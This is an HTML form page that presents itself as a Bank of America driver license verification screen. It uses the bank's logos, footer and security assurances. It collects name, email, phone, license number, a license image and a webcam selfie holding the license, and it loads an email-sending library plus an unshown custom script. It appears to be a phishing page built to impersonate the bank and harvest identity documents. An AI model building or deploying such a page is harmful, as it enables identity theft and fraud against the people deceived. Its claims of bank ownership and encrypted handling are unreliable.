<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Driver License Verification - Bank of America</title>
    <!-- Favicon -->
    <link rel="icon" href="https://www1.bac-assets.com/homepage/spa-assets/images/assets-images-global-favicon-favicon-CSX3d997.ico" type="image/x-icon">
    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/css/bootstrap.min.css" rel="stylesheet">
    <!-- Font Awesome for icons -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.2/css/all.min.css">
    <!-- Custom CSS -->
    <link rel="stylesheet" href="css/style.css">
</head>
<body>
    <div class="container py-5">
        <div class="row justify-content-center">
            <div class="col-lg-8">
                <!-- Bank of America Logo -->
                <div class="text-center mb-4">
                    <img src="https://www1.bac-assets.com/homepage/spa-assets/images/assets-images-global-logos-bac-logo-CSX3684d74d.svg" alt="Bank of America" style="height: 40px;">
                </div>
                
                <div class="card shadow">
                    <div class="card-header text-white">
                        <h3 class="mb-0">Driver License Verification</h3>
                    </div>                    <div class="card-body">
                        <div class="alert alert-info border-left border-4 border-boa">
                            <i class="fas fa-info-circle me-2 text-boa"></i>
                            <strong>Verification Instructions:</strong> Please take a selfie while holding your driver license for verification. Make sure both your face and the license are clearly visible.
                        </div>
                        
                        <form id="verificationForm">
                            <!-- Personal Information -->
                            <div class="mb-4">
                                <h5><i class="fas fa-user me-2 small"></i>Personal Information</h5>
                                <div class="row g-3">
                                    <div class="col-md-6">
                                        <label for="fullName" class="form-label">Full Name</label>
                                        <input type="text" class="form-control" id="fullName" required>
                                    </div>
                                    <div class="col-md-6">
                                        <label for="email" class="form-label">Email Address</label>
                                        <input type="email" class="form-control" id="email" required>
                                    </div>
                                    <div class="col-md-6">
                                        <label for="phone" class="form-label">Phone Number</label>
                                        <input type="tel" class="form-control" id="phone" required>
                                    </div>
                                    <div class="col-md-6">
                                        <label for="licenseNumber" class="form-label">License Number</label>
                                        <input type="text" class="form-control" id="licenseNumber" required>
                                    </div>
                                </div>
                            </div>
                              <!-- Driver License Upload Section -->
                            <div class="mb-4">
                                <h5><i class="fas fa-id-card me-2 small"></i>Driver License Upload</h5>
                                <div class="mb-3">
                                    <label for="licenseFile" class="form-label">Upload your driver license (optional)</label>
                                    <input class="form-control border-boa-light" type="file" id="licenseFile" accept="image/*">
                                </div>
                                
                                <div class="mb-3">
                                    <div id="licensePreview" class="mt-2 d-none">
                                        <h6>License Preview:</h6>
                                        <img id="licenseImage" class="img-fluid img-thumbnail" src="" alt="License preview">
                                    </div>
                                </div>
                            </div>
                              <!-- Selfie Capture Section -->
                            <div class="mb-4">
                                <h5><i class="fas fa-camera me-2 small"></i>Selfie with Driver License</h5>
                                <div class="text-center mb-3">
                                    <button type="button" id="startCamera" class="btn btn-outline-primary">
                                        <i class="fas fa-camera me-2"></i>Start Camera
                                    </button>
                                    <button type="button" id="capturePhoto" class="btn btn-success d-none">
                                        <i class="fas fa-camera-retro me-2"></i>Take Photo
                                    </button>
                                    <button type="button" id="retakePhoto" class="btn btn-secondary d-none">
                                        <i class="fas fa-redo me-2"></i>Retake
                                    </button>
                                </div>
                                
                                <!-- Camera stream and captured photo containers -->
                                <div class="row justify-content-center">
                                    <div class="col-md-8">
                                        <div class="camera-container position-relative">
                                            <video id="cameraStream" class="d-none w-100 border rounded" autoplay playsinline></video>
                                            <canvas id="captureCanvas" class="d-none w-100"></canvas>
                                            <img id="capturedPhoto" class="d-none w-100 border rounded" src="" alt="Captured selfie">
                                            <div id="cameraPlaceholder" class="text-center p-5 border rounded bg-light">
                                                <i class="fas fa-camera fa-3x mb-3 text-secondary"></i>
                                                <p>Click "Start Camera" to begin selfie capture</p>
                                            </div>
                                            <div class="camera-overlay d-none" id="cameraOverlay">
                                                <div class="overlay-instruction">
                                                    Hold your driver license next to your face
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <input type="hidden" id="selfieData" name="selfieData">
                            </div>
                              <!-- Terms and Submit -->
                            <div class="mb-4">
                                <div class="card bg-light border-0">
                                    <div class="card-body">
                                        <div class="form-check">
                                            <input type="checkbox" class="form-check-input" id="termsCheck" required>
                                            <label class="form-check-label small" for="termsCheck">
                                                I confirm that the information provided is accurate and I consent to the processing of my data for verification purposes in accordance with Bank of America's privacy policy.
                                            </label>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            
                            <div class="d-grid gap-2">
                                <button type="submit" id="submitBtn" class="btn btn-primary py-2" disabled>
                                    <i class="fas fa-paper-plane me-2"></i>Submit Verification
                                </button>
                            </div>
                        </form>
                        
                        <!-- Bank of America Security Notice -->
                        <div class="mt-4 pt-3 border-top">
                            <div class="d-flex align-items-center mb-2">
                                <i class="fas fa-shield-alt me-2 text-boa"></i>
                                <span class="small fw-bold text-boa">Secure Verification</span>
                            </div>
                            <p class="small text-muted mb-0">
                                Your information is encrypted and securely transmitted using industry-standard protocols.
                                Bank of America will never share your personal information with unauthorized third parties.
                            </p>
                        </div>
                    </div>
                </div>
                
                <!-- Footer -->
                <div class="mt-3 text-center small text-muted">
                    <p class="mb-1">© 2025 Bank of America Corporation. All rights reserved.</p>
                    <p class="mb-0">Bank of America, N.A. Member FDIC. Equal Housing Lender</p>
                </div>
            </div>
        </div>
    </div>
      <!-- Modal for Success -->
    <div class="modal fade" id="successModal" tabindex="-1" aria-hidden="true">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-header text-white">
                    <h5 class="modal-title">Verification Submitted</h5>
                    <button type="button" class="btn-close btn-close-white" data-bs-dismiss="modal" aria-label="Close"></button>
                </div>                <div class="modal-body py-4">
                    <div class="text-center mb-4">
                        <div class="mb-3 position-relative">
                            <img src="https://www1.bac-assets.com/homepage/spa-assets/images/assets-images-global-logos-bac-logo-CSX3684d74d.svg" alt="Bank of America" style="height: 30px;" class="mb-3">
                            <i class="fas fa-check-circle fa-4x mb-3 d-block"></i>
                        </div>
                        <h4 class="text-boa fw-bold">Thank You!</h4>
                        <p class="mb-0">Your verification has been successfully submitted.</p>
                        <p>You will receive a confirmation email shortly.</p>
                    </div>
                    <div class="alert alert-info border-left border-4 border-boa small">
                        <i class="fas fa-info-circle me-2"></i>
                        Your verification will be processed within 1-2 business days. You may be contacted for additional information if necessary.
                    </div>
                    <!-- The saved files information will be inserted here by JavaScript -->
                </div>                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
                    <a href="#" class="btn btn-primary" data-bs-dismiss="modal">Return to Online Banking</a>
                    <!-- In a real implementation with a server, we might include a download button here -->
                </div>
            </div>
        </div>
    </div>
    
    <!-- Bootstrap JS Bundle with Popper -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.3.2/dist/js/bootstrap.bundle.min.js"></script>
    <!-- EmailJS for sending emails -->
    <script src="https://cdn.jsdelivr.net/npm/@emailjs/browser@3/dist/email.min.js"></script>
    <!-- Custom JS -->
    <script src="js/script.js"></script>
</body>
</html>
